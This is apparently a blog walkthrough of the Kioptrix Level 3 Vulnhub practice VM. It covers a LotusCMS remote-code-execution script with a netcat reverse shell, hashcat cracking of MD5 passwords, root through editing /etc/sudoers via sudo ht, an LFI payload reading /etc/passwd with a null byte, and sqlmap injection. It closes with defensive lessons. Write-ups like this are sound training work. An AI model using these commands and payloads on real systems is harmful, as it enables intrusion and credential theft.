Kioptirx Level 3 without Metasploit (Vulnhub) Walkthough

Ploy Thanasornsawan
8 min readMay 12, 2020

--

You can download VM and practice from here

Step1 : Set up VM kali linux and Kioptrix level 3

On kali VM, network setting
->Tap ‘Adapter 1’ choose ‘NAT’
->Tab ‘Adapter 2’ choose ‘Host-Only’

On victim machine (Kioptrix level 3)
->Tab ‘Adapter 1’ choose ‘Host-Only’

Power Start both Kali machine and Victim machine
We set Host-Only to make all VMs in the same network.Now, we will discover IP victim with command ‘netdiscover -i eth1’ because we set kali machine to have virtual host on adapter 2

Step 2 : Find Victim IP by netdiscover

Now, we know Target IP is 192.168.56.106

Step 3 : enumerate service on target IP with nmap

From nmap scan result, we found that it has port 22, 80 open.

Step 4 : Information gathering on port 80 (web service) with dirb and try check lotuscms exploit on google
To find all path on that web server, you can choose other tools like gobuster, dirbuster, wfuzz, etc.

From dirb results, we see many interesting paths as /phpmyadmin, /index.php, etc. Let’s try test on browser

On path /index.html, we will see it is login page which use by LotusCMS.I test with default password like admin:admin and root:root but it not works

I try seach Lotuscms exploit on google and found github for manual exploit that the owner adapt code from metasploit to use.You can see detail and download from https://github.com/Hood3dRob1n/LotusCMS-Exploit

Step 5 : Gain Access

After clone github to our directory already, run command
./lotusRCE.sh TargetIP/

It wil ask for attacker IP and listening port,Let’s run nc -lvnp 5151
For waiting connection to Target IP with netcat on another terminal tab
Attacker IP: 192.168.56.104, Listening port: 5151

After select 1 is NetCat -e, you will see connection success on netcat port 5151 and when we try id for check privilege,Now we are user www-data
Let’s create tty shell: python -c ‘import pty; pty.spawn(“/bin/bash”)’

we will see symbol $ but when we try cd /root.It show can’t cd it means this user is non-privilege

after we cd /home to find some important file of this user, we found another users is dreg and loneferret. Inside folder of loneferret, we see this use can run editor by sudo ht but when we try run sudo ht.It ask for password for this user
We know that this website use php.So,let’s try find some config that use format php and grep only has word password by command
find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null

The result show password mysql is in file /home/www/kioptrix3.com/gallery/gconfig.php.Okays, we may not see password of loneferret now but if we can access phpMyAdmin, it is possible to see all user and password in database

see content file by cat gconfig.php and found username and password

Try username: root, password: fuckeyou on phpMyAdmin

We know that all config is folder Galley.So, let’s try click at gallery

Click at dev_accounts (This table possible to have username, password)

Click at Browse, we will see hash password of user dreg and loneferret

Let’s try check format hash password with hash-identifier and the result show it is md5 hash

copy hash password from phpMyAdmin to file hash.txt and then use hashcat to crack md5 password (-m 0 is md5 in hashcat)
hashcat -m 0 -a 0 ~/vulnhub/hash.txt /usr/share/wordlists/rockyou.txt

see plaintext password in hashcat with command — show

Now. we know that user loneferret use password: starwars
But when try sudo ht,it shows error opening terminal.Okays, from nmap result we know ssh port 22 was opened.Let’s try login on ssh instread

After we ssh login success and try sudo ht again,now it shows error xterm-256color and after i check the solution to fix.It need to run export TERM=xterm

After try sudo ht again,Now we got ‘File Efit Windows Help’

Step 6 : Gain high privilege as root by edit permission file
Press button ‘F3’ for open file and put path /etc/sudoers
Because now we are low privilege user.We will add /bin/sh for this user
So,when user try run sudo /bin/sh.User will run as root

press button ‘F2’ for save and then ctrl+c for exit

user loneferret run sudo /bin/sh and got high privilege as root

Vulnerability on php website were found as
- Local File Inclusion (LFI)
- sql injection to list all database and table

  1. Local File Inclusion on index file

We can check users on system from /etc/password on browser by http://example.com/index.php?page=../../../etc/passwd.You can read more on OWASP TOP 10 see vulnerability on website

from https://book.hacktricks.xyz/pentesting-web/file-inclusion

but after i try http://192.168.56.106/index.php?page=../../../etc/passwd and it not works.I try solution Null byte %00 and it show result all user on this webserver.You may can put any command instread of /etc/passwd to harm this webserver
Caution: this technique pass because from nmap result show header php version is 5.2.4 (Null byte %00 can use with version < PHP 5.4)

2. SQL injection with sqlmap to see all table data username and password

From dirb scan result, we found it has path /gallery that we can access and same folder name that we check on password file.So, let’s navigate to 192.168.56.106/gallery/.You will see image can’t show and when cursor mouse on Photo_Shoot.It try to resolve hostname to ‘kioptrix3.com/gallery/p.php/5’

vim /etc/hosts and add victim IP and hosname in file

And then restart browser by open new again and call kitoptrix3.com/gallery
Now, we can see image file on this website

We try click many link on browser to see which page can use sql injection and we found after click ‘Ligoat Press Room’ and see it has Sorting options

After choose ‘Photo Id’, on browser it shows command sql sort

From browser now, we know it can sql injection.Let’s save request on Burpsuit by right click and select ‘save to file’ and put name ‘sqli1’

vim sqli1 to edit parameter from id=1 to id=1*,So, we can use sqlmap to inject all paremeter in this file

We know database name gallery from browser and when run command below to check table.We found dev_accounts that should have username and password

Now, we will dump data from table dev_accounts in database gallery

Lesson learn:
1. Password reused on both sudo user and ssh login ->It should use different password and use strong password not use md5 hash and on ssh login should use private key not plaintext password
2. Improper Access Control, Should set permission to not allow non-privilege user can edit important file like /etc/sudoers
You can try set permission by set sticky bit by chmod +t to not allow user edit or delete file

from https://www.thegeekstuff.com/2013/02/sticky-bit/

3. backend should have filter format input and not get input directly from url to make vulnerability as Local File Inclusion(LFI) and SQL injection

4. Unrestricted Upload of File with Dangerous Type because we can accces database on phpMyAdmin and run query

--

--

Ploy Thanasornsawan
Ploy Thanasornsawan

No responses yet